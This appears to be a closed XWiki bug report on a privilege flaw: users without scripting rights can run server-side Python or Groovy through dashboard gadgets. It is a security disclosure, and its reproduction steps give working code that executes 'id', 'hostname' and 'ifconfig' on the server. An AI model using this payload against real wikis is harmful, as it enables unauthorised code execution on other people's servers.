Details
-
Type:
Bug
-
Status: Closed
-
Priority:
Critical
-
Resolution: Duplicate
-
Affects Version/s: 7.2, 8.4.4, 11.10.2
-
Fix Version/s: None
-
Component/s: Dashboard
-
Labels:
-
Development Priority:High
-
Difficulty:Unknown
-
Similar issues:
Description
Registered users without scripting/programming permissions are able to execute python/groovy scripts while editing personal dashboards.
Full path to reproduce:
1) Create new user on xwiki.org (or myxwiki.org)
2) Go to profile -> Edit -> My dashboard -> Add gadget
3) Choose either python or groovy.
4) Paste following python/groovy code (for unix powered xwiki)
import os print(os.popen("id").read()) print(os.popen("hostname").read()) print(os.popen("ifconfig").read())
r = Runtime.getRuntime() proc = r.exec('id'); BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream())); String s1 = null; while ((s1 = stdInput1.readLine()) != null) { print s1; }
5) Submit the gadget
Expected behaviour:
-User is unable to execute server side code due to lack of permissions
Current behaviour:
-User can execute server side code as seen on a screenshots.
This issue affects all versions of xwiki that have personal dashboard feature.
Attachments
Issue Links
- duplicates
-
XWIKI-14247 User without scripting rights can execute velocity/python scripts through velocity/python gadgets in Dashboard WebHome and User Profile dashboard.
-
- Closed
-